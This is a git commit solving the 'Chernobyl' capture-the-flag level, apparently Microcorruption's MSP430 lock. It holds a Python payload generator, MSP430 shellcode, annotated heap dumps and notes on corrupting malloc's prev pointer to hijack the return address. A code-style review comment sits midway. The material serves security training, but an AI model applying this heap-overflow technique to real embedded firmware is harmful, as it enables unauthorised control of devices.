Solve Chernobyl
parent
31df36d848
commit
f63718bc9b
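--- /dev/null
+++ b/17-Chernobyl/Code/crappy_python/chernobreak.py
@@ -0,0 +1,53 @@
+#!/usr/bin/env python3
+
+# user info
+user_struct_size = 0x12 # User is a tuple of (char[16], i16)
+
+users_per_box = 0x5
+
+# Stack info
+ret_stack_addr = 0x3dce - 0x0004 # 3nd index of header struct
+ret_addr = 0x49a2 # Address that will be returned to
+stackbuffer_top = 0x3df0 - 0x0006 # top of stack buffer, PLUS "new "
+target_offset = ((stackbuffer_top - ret_addr) & 0xffff) + 1
+
+print(f"{ret_stack_addr = :x}, {ret_addr = :x}, {target_offset = :x}");
+
+bnew = b'new '
+
+clobber = ret_stack_addr.to_bytes(2, 'little').hex() + 'fc50' + target_offset.to_bytes(2, 'little').hex()
+
+'''
+sub.b #1, r8 5883
+swpb r8 8810
+mov r8, sr 0248
+mov #4cfc, pc 3040 fc4c
+'''
+payload = "5883 8810 0248 3040fc4c"
+
+# Hash function, which governs the boxes
+def hash(byts: bytes):
+    ret = 0;
+    for c in byts:
+        ret += c
+        ret = ((ret << 5) - ret) & 0xffff
+    return ret
+
+# Fix a string by adding a character that causes a hash collision
+def fixhash(name:bytes, box:int, modulus:int):
+    error = box - (hash(name) % modulus)
+    if error % modulus == 0:
+        return name
+    name += (ord("@")+error+modulus).to_bytes(1, "big")
+    print(f"{name.hex() = }; {error = }; new box = {hash(name) % modulus}")
+    return name
+
+def a2h (s: str):
+    return bytes(s, 'ascii').hex()
+payload = f'{a2h("new ")} {fixhash(bytes.fromhex(payload), 0, 16).hex()} {a2h(" ;new 8 ;new @ ;new H ;new P ;")} {bnew.hex()} {fixhash(bytes.fromhex(clobber), 0, 16).hex()} {a2h(" ;new 1 ;new 9 ;new A ;new I ;new Q ;new")}'
+print(payload)
+
+exit(0)
+while 1:
+    name, box = input("> ").split()
+    print(fixhash(bytes(name, "ascii"), int(box), 16).decode('ascii'));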
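Review bot: `def hash(byts: bytes)` shadows the builtin `hash` for the rest of the module, so any later code expecting Python's own `hash` silently gets this one; renaming it (e.g. `box_hash`) and giving it the docstring `"""Return the 16-bit hash that governs which box a name lands in."""` would make the intent explicit. The unconditional `exit(0)` placed before `while 1:` makes the interactive helper loop unreachable, and when that loop is enabled `name, box = input("> ").split()` raises ValueError on any line that is not exactly two tokens, as does `int(box)` on a non-numeric second token. The trailing semicolons on `ret = 0;` and the two `print(...)` lines are no-ops in Python and worth dropping. `user_struct_size` and `users_per_box` are assigned but never read anywhere in this file, so either use them in the offset arithmetic or note why they are kept as documentation.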
@ -1,23 +1,23 @@
Hash Table, plus one full box:
Hash Table, plus one full box:
0 1 2 3 4 5 6 7 8 9 a b c d e f
5000: 0050 1050 1500 0b00 0300 0500 1650 2c50 .P.P.........P,P
5000:[0050 1050 1500]0b00 0300 0500 1650 2c50 .P.P.........P,P
5010: 0050 2650 2100 4250 a250 0251 6251 c251 .P&P!.BP.P.QbQ.Q
5010:[0050 2650 2100]4250 a250 0251 6251 c251 .P&P!.BP.P.QbQ.Q
5020: 2252 8252 e252 1050 3c50 2100 0b00 0000 "R.R.R.P<P!.....
5020: 2252 8252 e252[1050 3c50 2100]0b00 0000 "R.R.R.P<P!.....
5030: 0000 0000 0000 0000 0000 0000 2650 9c50 ............&P.P
5030: 0000 0000 0000 0000 0000 0000[2650 9c50 ............&P.P
5040: b500 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
5040: b500]4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
5050: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA
5050: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA
5060: 4141 4100 e004 4141 4141 4141 4141 4141 AAA...AAAAAAAAAA
5060: 4141 4100 e004 4141 4141 4141 4141 4141 AAA...AAAAAAAAAA
5070: 4141 4141 4100 e004 4141 4141 4141 4141 AAAAA...AAAAAAAA
5070: 4141 4141 4100 e004 4141 4141 4141 4141 AAAAA...AAAAAAAA
5080: 4141 4141 4141 4100 e004 4141 4141 4141 AAAAAAA...AAAAAA
5080: 4141 4141 4141 4100 e004 4141 4141 4141 AAAAAAA...AAAAAA
5090: 4141 4141 4141 4141 4100 e004 4141 4141 AAAAAAAAA...AAAA ; wait a second
5090: 4141 4141 4141 4141 4100 e004[4141 4141 AAAAAAAAA...AAAA ; wait a second
50a0: 4141 4141 4141 4141 4141 4100 e004 4141 AAAAAAAAAAA...AA
50a0: 4141]4141 4141 4141 4141 4100 e004 4141 AAAAAAAAAAA...AA
50b0: 4141 4141 4141 4141 4141 4141 4100 e004 AAAAAAAAAAAAA...
50b0: 4141 4141 4141 4141 4141 4141 4100 e004 AAAAAAAAAAAAA...
50c0: 4141 4141 4141 4141 4141 4141 4141 4100 AAAAAAAAAAAAAAA.
50c0: 4141 4141 4141 4141 4141 4141 4141 4100 AAAAAAAAAAAAAAA.
50d0: e004 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
50d0: e004 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
50e0: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA
50e0: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA
50f0: 4141 4100 e004 4141 4141 4800 9c50 5c51 AAA...AAAAH..P\Q
50f0: 4141 4100 e004 4141 4141 4800[9c50 5c51 AAA...AAAAH..P\Q
5100: b500 0000 0000 e004 0000 0000 0000 0000 ................
5100: b500]0000 0000 e004 0000 0000 0000 0000 ................
Heap metadata @ 2400: 0050 0080 0000
Heap metadata @ 2400: 0050 0080 0000
Heap start: 0x5000
Heap start: 0x5000
@ -51,10 +51,15 @@ Section header metadata @ 5026: 1050 3c50 2100
[ Prev: 5010, Next: 503c, Size: 0010 ]
[ Prev: 5010, Next: 503c, Size: 0010 ]
Data: 0a00 0000 0000 0000 0000 0000 0000 0000
Data: 0a00 0000 0000 0000 0000 0000 0000 0000
The Exploit:
When an 11th user is added, the software will attempt to double the size of the heap. Overwriting a heap Next pointer allows us toAAAA
for c in ['1', '9', 'A', 'I', 'Q', '0', '8', '@', 'H', 'P', 'AAAAAAAAAAAAAAAA', '']:
for c in ['1', '9', 'A', 'I', 'Q', '0', '8', '@', 'H', 'P', 'AAAAAAAAAAAAAAAA', '']:
print(f'new {c} ;',end="")
print(f'new {c} ;',end="")
Malloc:
- Checks to make sure next pointer is always ASCENDING
- Does not check prev pointer!!!!
The Exploit:
- Overwrite the prev pointer of a block so that it points to ~ the return address on stack
- Overwrite the size parameter so that, when added to the return address, it places pc somewhere nice
- Place pc into a payload on the stack
- INT 0x7f